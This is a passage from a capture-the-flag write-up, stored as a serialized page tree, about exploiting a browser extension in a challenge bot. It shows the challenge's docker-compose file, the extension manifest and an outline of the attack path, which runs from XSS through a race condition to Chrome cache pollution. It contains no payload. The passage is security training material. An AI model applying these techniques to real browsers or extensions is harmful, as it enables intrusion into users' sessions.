The only entry point we can have to exploit an XSS in the bot's context is an extension that is installed in its browser",{"type":33,"tag":75,"props":11534,"children":11537},{"imgSrc":11535,":width":11536},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731247859/writeups/shikanoko/bot_config_webext.webp","650",[],{"type":33,"tag":47,"props":11539,"children":11540},{},[11541],{"type":38,"value":11542},"A web service exposes a simple HTML page; we will see the content of the page in detail later.",{"type":33,"tag":114,"props":11544,"children":11546},{"lang":11545},"yaml",[11547],{"type":33,"tag":119,"props":11548,"children":11551},{"className":11549,"code":11550,"language":11545,"meta":8,"style":8},"language-yaml shiki shiki-themes vitesse-dark","version: '3'\n\nservices:\n  proxy:\n    image: nginx:latest\n    restart: always\n    ports:\n      - 8547:80\n    volumes:\n      - ./src:/var/www/html:ro\n      - ./proxy.conf:/etc/nginx/conf.d/default.conf:ro\n    networks:\n      - internal\n    depends_on:\n      - bot\n  bot:\n    build: bot\n    restart: always\n    environment:\n      APPNAME: Admin\n      APPURL: http://proxy/\n      APPURLREGEX: ^http(|s)://.*$\n      APPFLAG: fake{flag}\n      APPLIMIT: 2\n      APPLIMITTIME: 60\n      USE_PROXY: 1\n      DISPLAY: ${DISPLAY}\n    networks:\n      - internal\n    # uncoment this if you need to run the bot in GUI mode\n    # volumes:\n      # - /tmp/.X11-unix:/tmp/.X11-unix\n\nnetworks:\n  
internal:\n",[11552],{"type":33,"tag":105,"props":11553,"children":11554},{"__ignoreMap":8},[11555,11579,11586,11598,11610,11627,11644,11656,11669,11681,11693,11705,11717,11729,11741,11753,11765,11781,11796,11808,11825,11842,11859,11876,11893,11910,11926,11943,11954,11965,11973,11981,11989,11996,12008],{"type":33,"tag":128,"props":11556,"children":11557},{"class":130,"line":131},[11558,11563,11567,11571,11575],{"type":33,"tag":128,"props":11559,"children":11560},{"style":437},[11561],{"type":38,"value":11562},"version",{"type":33,"tag":128,"props":11564,"children":11565},{"style":312},[11566],{"type":38,"value":284},{"type":33,"tag":128,"props":11568,"children":11569},{"style":676},[11570],{"type":38,"value":6739},{"type":33,"tag":128,"props":11572,"children":11573},{"style":140},[11574],{"type":38,"value":8225},{"type":33,"tag":128,"props":11576,"children":11577},{"style":676},[11578],{"type":38,"value":10313},{"type":33,"tag":128,"props":11580,"children":11581},{"class":130,"line":362},[11582],{"type":33,"tag":128,"props":11583,"children":11584},{"emptyLinePlaceholder":896},[11585],{"type":38,"value":899},{"type":33,"tag":128,"props":11587,"children":11588},{"class":130,"line":403},[11589,11594],{"type":33,"tag":128,"props":11590,"children":11591},{"style":437},[11592],{"type":38,"value":11593},"services",{"type":33,"tag":128,"props":11595,"children":11596},{"style":312},[11597],{"type":38,"value":5318},{"type":33,"tag":128,"props":11599,"children":11600},{"class":130,"line":739},[11601,11606],{"type":33,"tag":128,"props":11602,"children":11603},{"style":437},[11604],{"type":38,"value":11605},"  proxy",{"type":33,"tag":128,"props":11607,"children":11608},{"style":312},[11609],{"type":38,"value":5318},{"type":33,"tag":128,"props":11611,"children":11612},{"class":130,"line":765},[11613,11618,11622],{"type":33,"tag":128,"props":11614,"children":11615},{"style":437},[11616],{"type":38,"value":11617},"    
image",{"type":33,"tag":128,"props":11619,"children":11620},{"style":312},[11621],{"type":38,"value":284},{"type":33,"tag":128,"props":11623,"children":11624},{"style":140},[11625],{"type":38,"value":11626}," nginx:latest\n",{"type":33,"tag":128,"props":11628,"children":11629},{"class":130,"line":804},[11630,11635,11639],{"type":33,"tag":128,"props":11631,"children":11632},{"style":437},[11633],{"type":38,"value":11634},"    restart",{"type":33,"tag":128,"props":11636,"children":11637},{"style":312},[11638],{"type":38,"value":284},{"type":33,"tag":128,"props":11640,"children":11641},{"style":140},[11642],{"type":38,"value":11643}," always\n",{"type":33,"tag":128,"props":11645,"children":11646},{"class":130,"line":839},[11647,11652],{"type":33,"tag":128,"props":11648,"children":11649},{"style":437},[11650],{"type":38,"value":11651},"    ports",{"type":33,"tag":128,"props":11653,"children":11654},{"style":312},[11655],{"type":38,"value":5318},{"type":33,"tag":128,"props":11657,"children":11658},{"class":130,"line":848},[11659,11664],{"type":33,"tag":128,"props":11660,"children":11661},{"style":312},[11662],{"type":38,"value":11663},"      -",{"type":33,"tag":128,"props":11665,"children":11666},{"style":140},[11667],{"type":38,"value":11668}," 8547:80\n",{"type":33,"tag":128,"props":11670,"children":11671},{"class":130,"line":976},[11672,11677],{"type":33,"tag":128,"props":11673,"children":11674},{"style":437},[11675],{"type":38,"value":11676},"    volumes",{"type":33,"tag":128,"props":11678,"children":11679},{"style":312},[11680],{"type":38,"value":5318},{"type":33,"tag":128,"props":11682,"children":11683},{"class":130,"line":988},[11684,11688],{"type":33,"tag":128,"props":11685,"children":11686},{"style":312},[11687],{"type":38,"value":11663},{"type":33,"tag":128,"props":11689,"children":11690},{"style":140},[11691],{"type":38,"value":11692}," 
./src:/var/www/html:ro\n",{"type":33,"tag":128,"props":11694,"children":11695},{"class":130,"line":1001},[11696,11700],{"type":33,"tag":128,"props":11697,"children":11698},{"style":312},[11699],{"type":38,"value":11663},{"type":33,"tag":128,"props":11701,"children":11702},{"style":140},[11703],{"type":38,"value":11704}," ./proxy.conf:/etc/nginx/conf.d/default.conf:ro\n",{"type":33,"tag":128,"props":11706,"children":11707},{"class":130,"line":1014},[11708,11713],{"type":33,"tag":128,"props":11709,"children":11710},{"style":437},[11711],{"type":38,"value":11712},"    networks",{"type":33,"tag":128,"props":11714,"children":11715},{"style":312},[11716],{"type":38,"value":5318},{"type":33,"tag":128,"props":11718,"children":11719},{"class":130,"line":1026},[11720,11724],{"type":33,"tag":128,"props":11721,"children":11722},{"style":312},[11723],{"type":38,"value":11663},{"type":33,"tag":128,"props":11725,"children":11726},{"style":140},[11727],{"type":38,"value":11728}," internal\n",{"type":33,"tag":128,"props":11730,"children":11731},{"class":130,"line":1038},[11732,11737],{"type":33,"tag":128,"props":11733,"children":11734},{"style":437},[11735],{"type":38,"value":11736},"    depends_on",{"type":33,"tag":128,"props":11738,"children":11739},{"style":312},[11740],{"type":38,"value":5318},{"type":33,"tag":128,"props":11742,"children":11743},{"class":130,"line":1051},[11744,11748],{"type":33,"tag":128,"props":11745,"children":11746},{"style":312},[11747],{"type":38,"value":11663},{"type":33,"tag":128,"props":11749,"children":11750},{"style":140},[11751],{"type":38,"value":11752}," bot\n",{"type":33,"tag":128,"props":11754,"children":11755},{"class":130,"line":1063},[11756,11761],{"type":33,"tag":128,"props":11757,"children":11758},{"style":437},[11759],{"type":38,"value":11760},"  
bot",{"type":33,"tag":128,"props":11762,"children":11763},{"style":312},[11764],{"type":38,"value":5318},{"type":33,"tag":128,"props":11766,"children":11767},{"class":130,"line":1076},[11768,11773,11777],{"type":33,"tag":128,"props":11769,"children":11770},{"style":437},[11771],{"type":38,"value":11772},"    build",{"type":33,"tag":128,"props":11774,"children":11775},{"style":312},[11776],{"type":38,"value":284},{"type":33,"tag":128,"props":11778,"children":11779},{"style":140},[11780],{"type":38,"value":11752},{"type":33,"tag":128,"props":11782,"children":11783},{"class":130,"line":1089},[11784,11788,11792],{"type":33,"tag":128,"props":11785,"children":11786},{"style":437},[11787],{"type":38,"value":11634},{"type":33,"tag":128,"props":11789,"children":11790},{"style":312},[11791],{"type":38,"value":284},{"type":33,"tag":128,"props":11793,"children":11794},{"style":140},[11795],{"type":38,"value":11643},{"type":33,"tag":128,"props":11797,"children":11798},{"class":130,"line":1101},[11799,11804],{"type":33,"tag":128,"props":11800,"children":11801},{"style":437},[11802],{"type":38,"value":11803},"    environment",{"type":33,"tag":128,"props":11805,"children":11806},{"style":312},[11807],{"type":38,"value":5318},{"type":33,"tag":128,"props":11809,"children":11810},{"class":130,"line":1114},[11811,11816,11820],{"type":33,"tag":128,"props":11812,"children":11813},{"style":437},[11814],{"type":38,"value":11815},"      APPNAME",{"type":33,"tag":128,"props":11817,"children":11818},{"style":312},[11819],{"type":38,"value":284},{"type":33,"tag":128,"props":11821,"children":11822},{"style":140},[11823],{"type":38,"value":11824}," Admin\n",{"type":33,"tag":128,"props":11826,"children":11827},{"class":130,"line":1127},[11828,11833,11837],{"type":33,"tag":128,"props":11829,"children":11830},{"style":437},[11831],{"type":38,"value":11832},"      
APPURL",{"type":33,"tag":128,"props":11834,"children":11835},{"style":312},[11836],{"type":38,"value":284},{"type":33,"tag":128,"props":11838,"children":11839},{"style":140},[11840],{"type":38,"value":11841}," http://proxy/\n",{"type":33,"tag":128,"props":11843,"children":11844},{"class":130,"line":1139},[11845,11850,11854],{"type":33,"tag":128,"props":11846,"children":11847},{"style":437},[11848],{"type":38,"value":11849},"      APPURLREGEX",{"type":33,"tag":128,"props":11851,"children":11852},{"style":312},[11853],{"type":38,"value":284},{"type":33,"tag":128,"props":11855,"children":11856},{"style":140},[11857],{"type":38,"value":11858}," ^http(|s)://.*$\n",{"type":33,"tag":128,"props":11860,"children":11861},{"class":130,"line":1152},[11862,11867,11871],{"type":33,"tag":128,"props":11863,"children":11864},{"style":437},[11865],{"type":38,"value":11866},"      APPFLAG",{"type":33,"tag":128,"props":11868,"children":11869},{"style":312},[11870],{"type":38,"value":284},{"type":33,"tag":128,"props":11872,"children":11873},{"style":140},[11874],{"type":38,"value":11875}," fake{flag}\n",{"type":33,"tag":128,"props":11877,"children":11878},{"class":130,"line":1165},[11879,11884,11888],{"type":33,"tag":128,"props":11880,"children":11881},{"style":437},[11882],{"type":38,"value":11883},"      APPLIMIT",{"type":33,"tag":128,"props":11885,"children":11886},{"style":312},[11887],{"type":38,"value":284},{"type":33,"tag":128,"props":11889,"children":11890},{"style":523},[11891],{"type":38,"value":11892}," 2\n",{"type":33,"tag":128,"props":11894,"children":11895},{"class":130,"line":1177},[11896,11901,11905],{"type":33,"tag":128,"props":11897,"children":11898},{"style":437},[11899],{"type":38,"value":11900},"      APPLIMITTIME",{"type":33,"tag":128,"props":11902,"children":11903},{"style":312},[11904],{"type":38,"value":284},{"type":33,"tag":128,"props":11906,"children":11907},{"style":523},[11908],{"type":38,"value":11909}," 
60\n",{"type":33,"tag":128,"props":11911,"children":11912},{"class":130,"line":1189},[11913,11918,11922],{"type":33,"tag":128,"props":11914,"children":11915},{"style":437},[11916],{"type":38,"value":11917},"      USE_PROXY",{"type":33,"tag":128,"props":11919,"children":11920},{"style":312},[11921],{"type":38,"value":284},{"type":33,"tag":128,"props":11923,"children":11924},{"style":523},[11925],{"type":38,"value":1338},{"type":33,"tag":128,"props":11927,"children":11928},{"class":130,"line":1202},[11929,11934,11938],{"type":33,"tag":128,"props":11930,"children":11931},{"style":437},[11932],{"type":38,"value":11933},"      DISPLAY",{"type":33,"tag":128,"props":11935,"children":11936},{"style":312},[11937],{"type":38,"value":284},{"type":33,"tag":128,"props":11939,"children":11940},{"style":140},[11941],{"type":38,"value":11942}," ${DISPLAY}\n",{"type":33,"tag":128,"props":11944,"children":11945},{"class":130,"line":1214},[11946,11950],{"type":33,"tag":128,"props":11947,"children":11948},{"style":437},[11949],{"type":38,"value":11712},{"type":33,"tag":128,"props":11951,"children":11952},{"style":312},[11953],{"type":38,"value":5318},{"type":33,"tag":128,"props":11955,"children":11956},{"class":130,"line":1226},[11957,11961],{"type":33,"tag":128,"props":11958,"children":11959},{"style":312},[11960],{"type":38,"value":11663},{"type":33,"tag":128,"props":11962,"children":11963},{"style":140},[11964],{"type":38,"value":11728},{"type":33,"tag":128,"props":11966,"children":11967},{"class":130,"line":1239},[11968],{"type":33,"tag":128,"props":11969,"children":11970},{"style":5541},[11971],{"type":38,"value":11972},"    # uncoment this if you need to run the bot in GUI mode\n",{"type":33,"tag":128,"props":11974,"children":11975},{"class":130,"line":1251},[11976],{"type":33,"tag":128,"props":11977,"children":11978},{"style":5541},[11979],{"type":38,"value":11980},"    # 
volumes:\n",{"type":33,"tag":128,"props":11982,"children":11983},{"class":130,"line":1263},[11984],{"type":33,"tag":128,"props":11985,"children":11986},{"style":5541},[11987],{"type":38,"value":11988},"      # - /tmp/.X11-unix:/tmp/.X11-unix\n",{"type":33,"tag":128,"props":11990,"children":11991},{"class":130,"line":1276},[11992],{"type":33,"tag":128,"props":11993,"children":11994},{"emptyLinePlaceholder":896},[11995],{"type":38,"value":899},{"type":33,"tag":128,"props":11997,"children":11998},{"class":130,"line":1288},[11999,12004],{"type":33,"tag":128,"props":12000,"children":12001},{"style":437},[12002],{"type":38,"value":12003},"networks",{"type":33,"tag":128,"props":12005,"children":12006},{"style":312},[12007],{"type":38,"value":5318},{"type":33,"tag":128,"props":12009,"children":12010},{"class":130,"line":1300},[12011,12016],{"type":33,"tag":128,"props":12012,"children":12013},{"style":437},[12014],{"type":38,"value":12015},"  internal",{"type":33,"tag":128,"props":12017,"children":12018},{"style":312},[12019],{"type":38,"value":5318},{"type":33,"tag":47,"props":12021,"children":12022},{},[12023],{"type":38,"value":12024},"The writeup will therefore focus on the parts specific to the web extension and web service. We will see how the extension works, how to exploit it, and how to retrieve the flag:",{"type":33,"tag":75,"props":12026,"children":12029},{"imgSrc":12027,":width":12028},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731248622/writeups/shikanoko/source_code.webp","350",[],{"type":33,"tag":40,"props":12031,"children":12033},{"id":12032},"how-does-a-web-extension-work",[12034],{"type":38,"value":12035},"How does a web extension work?",{"type":33,"tag":47,"props":12037,"children":12038},{},[12039,12041,12047],{"type":38,"value":12040},"It is important to review how a web extension works. 
If you are comfortable with this concept, I advise you to move on to the next chapter: ",{"type":33,"tag":53,"props":12042,"children":12044},{"href":12043},"#race-condition-to-chrome-cache-pollution",[12045],{"type":38,"value":12046},"Race condition to chrome cache pollution",{"type":38,"value":215},{"type":33,"tag":47,"props":12049,"children":12050},{},[12051],{"type":38,"value":12052},"Despite the paradigm being the same (a browser), a web extension will have a different architecture and files than a simple web page. This is what we are going to see below:",{"type":33,"tag":88,"props":12054,"children":12056},{"id":12055},"manifest-file",[12057],{"type":38,"value":12058},"Manifest File:",{"type":33,"tag":47,"props":12060,"children":12061},{},[12062],{"type":38,"value":12063},"Every extension has a manifest.json file, which is the blueprint of the extension. It defines the permissions, version, name, scripts, and features of the extension.",{"type":33,"tag":47,"props":12065,"children":12066},{},[12067],{"type":38,"value":12068},"Below is the manifest of the challenge extension:",{"type":33,"tag":114,"props":12070,"children":12071},{"lang":633},[12072],{"type":33,"tag":119,"props":12073,"children":12075},{"className":637,"code":12074,"language":633,"meta":8,"style":8},"{\n  \"manifest_version\": 3,\n  \"name\": \"Custom Extension\",\n  \"$schema\": \"https://json.schemastore.org/chrome-manifest.json\",\n  \"version\": \"0.1.0\",\n  \"description\": \"My Chrome Extension\",\n  \"icons\": {\n    \"16\": \"icons/icon_16.png\",\n    \"32\": \"icons/icon_32.png\",\n    \"48\": \"icons/icon_48.png\",\n    \"128\": \"icons/icon_128.png\"\n  },\n  \"background\": {\n    \"service_worker\": \"background.js\"\n  },\n  \"action\": {\n    \"default_title\": \"Custom Extension\",\n    \"default_popup\": \"popup.html\"\n  },\n  \"permissions\": [\n    \"storage\",\n    \"tabs\"\n  ],\n  \"content_scripts\": [\n    {\n      \"matches\": [\n        \"\u003Call_urls>\"\n    
  ],\n      \"run_at\": \"document_idle\",\n      \"js\": [\n        \"contentScript.js\"\n      ]\n    }\n  ]\n}\n\n",[12076],{"type":33,"tag":105,"props":12077,"children":12078},{"__ignoreMap":8},[12079,12086,12115,12152,12189,12225,12262,12286,12323,12360,12397,12430,12438,12462,12495,12502,12526,12562,12595,12602,12625,12645,12661,12668,12692,12700,12725,12742,12750,12787,12810,12826,12834,12841,12848],{"type":33,"tag":128,"props":12080,"children":12081},{"class":130,"line":131},[12082],{"type":33,"tag":128,"props":12083,"children":12084},{"style":312},[12085],{"type":38,"value":650},{"type":33,"tag":128,"props":12087,"children":12088},{"class":130,"line":362},[12089,12093,12098,12102,12106,12111],{"type":33,"tag":128,"props":12090,"children":12091},{"style":656},[12092],{"type":38,"value":659},{"type":33,"tag":128,"props":12094,"children":12095},{"style":437},[12096],{"type":38,"value":12097},"manifest_version",{"type":33,"tag":128,"props":12099,"children":12100},{"style":656},[12101],{"type":38,"value":669},{"type":33,"tag":128,"props":12103,"children":12104},{"style":312},[12105],{"type":38,"value":284},{"type":33,"tag":128,"props":12107,"children":12108},{"style":523},[12109],{"type":38,"value":12110}," 
3",{"type":33,"tag":128,"props":12112,"children":12113},{"style":312},[12114],{"type":38,"value":693},{"type":33,"tag":128,"props":12116,"children":12117},{"class":130,"line":403},[12118,12122,12127,12131,12135,12139,12144,12148],{"type":33,"tag":128,"props":12119,"children":12120},{"style":656},[12121],{"type":38,"value":659},{"type":33,"tag":128,"props":12123,"children":12124},{"style":437},[12125],{"type":38,"value":12126},"name",{"type":33,"tag":128,"props":12128,"children":12129},{"style":656},[12130],{"type":38,"value":669},{"type":33,"tag":128,"props":12132,"children":12133},{"style":312},[12134],{"type":38,"value":284},{"type":33,"tag":128,"props":12136,"children":12137},{"style":676},[12138],{"type":38,"value":679},{"type":33,"tag":128,"props":12140,"children":12141},{"style":140},[12142],{"type":38,"value":12143},"Custom Extension",{"type":33,"tag":128,"props":12145,"children":12146},{"style":676},[12147],{"type":38,"value":669},{"type":33,"tag":128,"props":12149,"children":12150},{"style":312},[12151],{"type":38,"value":693},{"type":33,"tag":128,"props":12153,"children":12154},{"class":130,"line":739},[12155,12159,12164,12168,12172,12176,12181,12185],{"type":33,"tag":128,"props":12156,"children":12157},{"style":656},[12158],{"type":38,"value":659},{"type":33,"tag":128,"props":12160,"children":12161},{"style":437},[12162],{"type":38,"value":12163},"$schema",{"type":33,"tag":128,"props":12165,"children":12166},{"style":656},[12167],{"type":38,"value":669},{"type":33,"tag":128,"props":12169,"children":12170},{"style":312},[12171],{"type":38,"value":284},{"type":33,"tag":128,"props":12173,"children":12174},{"style":676},[12175],{"type":38,"value":679},{"type":33,"tag":128,"props":12177,"children":12178},{"style":140},[12179],{"type":38,"value":12180},"https://json.schemastore.org/chrome-manifest.json",{"type":33,"tag":128,"props":12182,"children":12183},{"style":676},[12184],{"type":38,"value":669},{"type":33,"tag":128,"props":12186,"children":12187},{"style"
:312},[12188],{"type":38,"value":693},{"type":33,"tag":128,"props":12190,"children":12191},{"class":130,"line":765},[12192,12196,12200,12204,12208,12212,12217,12221],{"type":33,"tag":128,"props":12193,"children":12194},{"style":656},[12195],{"type":38,"value":659},{"type":33,"tag":128,"props":12197,"children":12198},{"style":437},[12199],{"type":38,"value":11562},{"type":33,"tag":128,"props":12201,"children":12202},{"style":656},[12203],{"type":38,"value":669},{"type":33,"tag":128,"props":12205,"children":12206},{"style":312},[12207],{"type":38,"value":284},{"type":33,"tag":128,"props":12209,"children":12210},{"style":676},[12211],{"type":38,"value":679},{"type":33,"tag":128,"props":12213,"children":12214},{"style":140},[12215],{"type":38,"value":12216},"0.1.0",{"type":33,"tag":128,"props":12218,"children":12219},{"style":676},[12220],{"type":38,"value":669},{"type":33,"tag":128,"props":12222,"children":12223},{"style":312},[12224],{"type":38,"value":693},{"type":33,"tag":128,"props":12226,"children":12227},{"class":130,"line":804},[12228,12232,12237,12241,12245,12249,12254,12258],{"type":33,"tag":128,"props":12229,"children":12230},{"style":656},[12231],{"type":38,"value":659},{"type":33,"tag":128,"props":12233,"children":12234},{"style":437},[12235],{"type":38,"value":12236},"description",{"type":33,"tag":128,"props":12238,"children":12239},{"style":656},[12240],{"type":38,"value":669},{"type":33,"tag":128,"props":12242,"children":12243},{"style":312},[12244],{"type":38,"value":284},{"type":33,"tag":128,"props":12246,"children":12247},{"style":676},[12248],{"type":38,"value":679},{"type":33,"tag":128,"props":12250,"children":12251},{"style":140},[12252],{"type":38,"value":12253},"My Chrome 
Extension",{"type":33,"tag":128,"props":12255,"children":12256},{"style":676},[12257],{"type":38,"value":669},{"type":33,"tag":128,"props":12259,"children":12260},{"style":312},[12261],{"type":38,"value":693},{"type":33,"tag":128,"props":12263,"children":12264},{"class":130,"line":839},[12265,12269,12274,12278,12282],{"type":33,"tag":128,"props":12266,"children":12267},{"style":656},[12268],{"type":38,"value":659},{"type":33,"tag":128,"props":12270,"children":12271},{"style":437},[12272],{"type":38,"value":12273},"icons",{"type":33,"tag":128,"props":12275,"children":12276},{"style":656},[12277],{"type":38,"value":669},{"type":33,"tag":128,"props":12279,"children":12280},{"style":312},[12281],{"type":38,"value":284},{"type":33,"tag":128,"props":12283,"children":12284},{"style":312},[12285],{"type":38,"value":762},{"type":33,"tag":128,"props":12287,"children":12288},{"class":130,"line":848},[12289,12293,12298,12302,12306,12310,12315,12319],{"type":33,"tag":128,"props":12290,"children":12291},{"style":656},[12292],{"type":38,"value":771},{"type":33,"tag":128,"props":12294,"children":12295},{"style":437},[12296],{"type":38,"value":12297},"16",{"type":33,"tag":128,"props":12299,"children":12300},{"style":656},[12301],{"type":38,"value":669},{"type":33,"tag":128,"props":12303,"children":12304},{"style":312},[12305],{"type":38,"value":284},{"type":33,"tag":128,"props":12307,"children":12308},{"style":676},[12309],{"type":38,"value":679},{"type":33,"tag":128,"props":12311,"children":12312},{"style":140},[12313],{"type":38,"value":12314},"icons/icon_16.png",{"type":33,"tag":128,"props":12316,"children":12317},{"style":676},[12318],{"type":38,"value":669},{"type":33,"tag":128,"props":12320,"children":12321},{"style":312},[12322],{"type":38,"value":693},{"type":33,"tag":128,"props":12324,"children":12325},{"class":130,"line":976},[12326,12330,12335,12339,12343,12347,12352,12356],{"type":33,"tag":128,"props":12327,"children":12328},{"style":656},[12329],{"type":38,"value":771},
{"type":33,"tag":128,"props":12331,"children":12332},{"style":437},[12333],{"type":38,"value":12334},"32",{"type":33,"tag":128,"props":12336,"children":12337},{"style":656},[12338],{"type":38,"value":669},{"type":33,"tag":128,"props":12340,"children":12341},{"style":312},[12342],{"type":38,"value":284},{"type":33,"tag":128,"props":12344,"children":12345},{"style":676},[12346],{"type":38,"value":679},{"type":33,"tag":128,"props":12348,"children":12349},{"style":140},[12350],{"type":38,"value":12351},"icons/icon_32.png",{"type":33,"tag":128,"props":12353,"children":12354},{"style":676},[12355],{"type":38,"value":669},{"type":33,"tag":128,"props":12357,"children":12358},{"style":312},[12359],{"type":38,"value":693},{"type":33,"tag":128,"props":12361,"children":12362},{"class":130,"line":988},[12363,12367,12372,12376,12380,12384,12389,12393],{"type":33,"tag":128,"props":12364,"children":12365},{"style":656},[12366],{"type":38,"value":771},{"type":33,"tag":128,"props":12368,"children":12369},{"style":437},[12370],{"type":38,"value":12371},"48",{"type":33,"tag":128,"props":12373,"children":12374},{"style":656},[12375],{"type":38,"value":669},{"type":33,"tag":128,"props":12377,"children":12378},{"style":312},[12379],{"type":38,"value":284},{"type":33,"tag":128,"props":12381,"children":12382},{"style":676},[12383],{"type":38,"value":679},{"type":33,"tag":128,"props":12385,"children":12386},{"style":140},[12387],{"type":38,"value":12388},"icons/icon_48.png",{"type":33,"tag":128,"props":12390,"children":12391},{"style":676},[12392],{"type":38,"value":669},{"type":33,"tag":128,"props":12394,"children":12395},{"style":312},[12396],{"type":38,"value":693},{"type":33,"tag":128,"props":12398,"children":12399},{"class":130,"line":1001},[12400,12404,12409,12413,12417,12421,12426],{"type":33,"tag":128,"props":12401,"children":12402},{"style":656},[12403],{"type":38,"value":771},{"type":33,"tag":128,"props":12405,"children":12406},{"style":437},[12407],{"type":38,"value":12408},"128",
{"type":33,"tag":128,"props":12410,"children":12411},{"style":656},[12412],{"type":38,"value":669},{"type":33,"tag":128,"props":12414,"children":12415},{"style":312},[12416],{"type":38,"value":284},{"type":33,"tag":128,"props":12418,"children":12419},{"style":676},[12420],{"type":38,"value":679},{"type":33,"tag":128,"props":12422,"children":12423},{"style":140},[12424],{"type":38,"value":12425},"icons/icon_128.png",{"type":33,"tag":128,"props":12427,"children":12428},{"style":676},[12429],{"type":38,"value":836},{"type":33,"tag":128,"props":12431,"children":12432},{"class":130,"line":1014},[12433],{"type":33,"tag":128,"props":12434,"children":12435},{"style":312},[12436],{"type":38,"value":12437},"  },\n",{"type":33,"tag":128,"props":12439,"children":12440},{"class":130,"line":1026},[12441,12445,12450,12454,12458],{"type":33,"tag":128,"props":12442,"children":12443},{"style":656},[12444],{"type":38,"value":659},{"type":33,"tag":128,"props":12446,"children":12447},{"style":437},[12448],{"type":38,"value":12449},"background",{"type":33,"tag":128,"props":12451,"children":12452},{"style":656},[12453],{"type":38,"value":669},{"type":33,"tag":128,"props":12455,"children":12456},{"style":312},[12457],{"type":38,"value":284},{"type":33,"tag":128,"props":12459,"children":12460},{"style":312},[12461],{"type":38,"value":762},{"type":33,"tag":128,"props":12463,"children":12464},{"class":130,"line":1038},[12465,12469,12474,12478,12482,12486,12491],{"type":33,"tag":128,"props":12466,"children":12467},{"style":656},[12468],{"type":38,"value":771},{"type":33,"tag":128,"props":12470,"children":12471},{"style":437},[12472],{"type":38,"value":12473},"service_worker",{"type":33,"tag":128,"props":12475,"children":12476},{"style":656},[12477],{"type":38,"value":669},{"type":33,"tag":128,"props":12479,"children":12480},{"style":312},[12481],{"type":38,"value":284},{"type":33,"tag":128,"props":12483,"children":12484},{"style":676},[12485],{"type":38,"value":679},{"type":33,"tag":128,"props
":12487,"children":12488},{"style":140},[12489],{"type":38,"value":12490},"background.js",{"type":33,"tag":128,"props":12492,"children":12493},{"style":676},[12494],{"type":38,"value":836},{"type":33,"tag":128,"props":12496,"children":12497},{"class":130,"line":1051},[12498],{"type":33,"tag":128,"props":12499,"children":12500},{"style":312},[12501],{"type":38,"value":12437},{"type":33,"tag":128,"props":12503,"children":12504},{"class":130,"line":1063},[12505,12509,12514,12518,12522],{"type":33,"tag":128,"props":12506,"children":12507},{"style":656},[12508],{"type":38,"value":659},{"type":33,"tag":128,"props":12510,"children":12511},{"style":437},[12512],{"type":38,"value":12513},"action",{"type":33,"tag":128,"props":12515,"children":12516},{"style":656},[12517],{"type":38,"value":669},{"type":33,"tag":128,"props":12519,"children":12520},{"style":312},[12521],{"type":38,"value":284},{"type":33,"tag":128,"props":12523,"children":12524},{"style":312},[12525],{"type":38,"value":762},{"type":33,"tag":128,"props":12527,"children":12528},{"class":130,"line":1076},[12529,12533,12538,12542,12546,12550,12554,12558],{"type":33,"tag":128,"props":12530,"children":12531},{"style":656},[12532],{"type":38,"value":771},{"type":33,"tag":128,"props":12534,"children":12535},{"style":437},[12536],{"type":38,"value":12537},"default_title",{"type":33,"tag":128,"props":12539,"children":12540},{"style":656},[12541],{"type":38,"value":669},{"type":33,"tag":128,"props":12543,"children":12544},{"style":312},[12545],{"type":38,"value":284},{"type":33,"tag":128,"props":12547,"children":12548},{"style":676},[12549],{"type":38,"value":679},{"type":33,"tag":128,"props":12551,"children":12552},{"style":140},[12553],{"type":38,"value":12143},{"type":33,"tag":128,"props":12555,"children":12556},{"style":676},[12557],{"type":38,"value":669},{"type":33,"tag":128,"props":12559,"children":12560},{"style":312},[12561],{"type":38,"value":693},{"type":33,"tag":128,"props":12563,"children":12564},{"class":130
,"line":1089},[12565,12569,12574,12578,12582,12586,12591],{"type":33,"tag":128,"props":12566,"children":12567},{"style":656},[12568],{"type":38,"value":771},{"type":33,"tag":128,"props":12570,"children":12571},{"style":437},[12572],{"type":38,"value":12573},"default_popup",{"type":33,"tag":128,"props":12575,"children":12576},{"style":656},[12577],{"type":38,"value":669},{"type":33,"tag":128,"props":12579,"children":12580},{"style":312},[12581],{"type":38,"value":284},{"type":33,"tag":128,"props":12583,"children":12584},{"style":676},[12585],{"type":38,"value":679},{"type":33,"tag":128,"props":12587,"children":12588},{"style":140},[12589],{"type":38,"value":12590},"popup.html",{"type":33,"tag":128,"props":12592,"children":12593},{"style":676},[12594],{"type":38,"value":836},{"type":33,"tag":128,"props":12596,"children":12597},{"class":130,"line":1101},[12598],{"type":33,"tag":128,"props":12599,"children":12600},{"style":312},[12601],{"type":38,"value":12437},{"type":33,"tag":128,"props":12603,"children":12604},{"class":130,"line":1114},[12605,12609,12613,12617,12621],{"type":33,"tag":128,"props":12606,"children":12607},{"style":656},[12608],{"type":38,"value":659},{"type":33,"tag":128,"props":12610,"children":12611},{"style":437},[12612],{"type":38,"value":1453},{"type":33,"tag":128,"props":12614,"children":12615},{"style":656},[12616],{"type":38,"value":669},{"type":33,"tag":128,"props":12618,"children":12619},{"style":312},[12620],{"type":38,"value":284},{"type":33,"tag":128,"props":12622,"children":12623},{"style":312},[12624],{"type":38,"value":1466},{"type":33,"tag":128,"props":12626,"children":12627},{"class":130,"line":1127},[12628,12632,12637,12641],{"type":33,"tag":128,"props":12629,"children":12630},{"style":676},[12631],{"type":38,"value":771},{"type":33,"tag":128,"props":12633,"children":12634},{"style":140},[12635],{"type":38,"value":12636},"storage",{"type":33,"tag":128,"props":12638,"children":12639},{"style":676},[12640],{"type":38,"value":669},{"type
":33,"tag":128,"props":12642,"children":12643},{"style":312},[12644],{"type":38,"value":693},{"type":33,"tag":128,"props":12646,"children":12647},{"class":130,"line":1139},[12648,12652,12657],{"type":33,"tag":128,"props":12649,"children":12650},{"style":676},[12651],{"type":38,"value":771},{"type":33,"tag":128,"props":12653,"children":12654},{"style":140},[12655],{"type":38,"value":12656},"tabs",{"type":33,"tag":128,"props":12658,"children":12659},{"style":676},[12660],{"type":38,"value":836},{"type":33,"tag":128,"props":12662,"children":12663},{"class":130,"line":1152},[12664],{"type":33,"tag":128,"props":12665,"children":12666},{"style":312},[12667],{"type":38,"value":2155},{"type":33,"tag":128,"props":12669,"children":12670},{"class":130,"line":1165},[12671,12675,12680,12684,12688],{"type":33,"tag":128,"props":12672,"children":12673},{"style":656},[12674],{"type":38,"value":659},{"type":33,"tag":128,"props":12676,"children":12677},{"style":437},[12678],{"type":38,"value":12679},"content_scripts",{"type":33,"tag":128,"props":12681,"children":12682},{"style":656},[12683],{"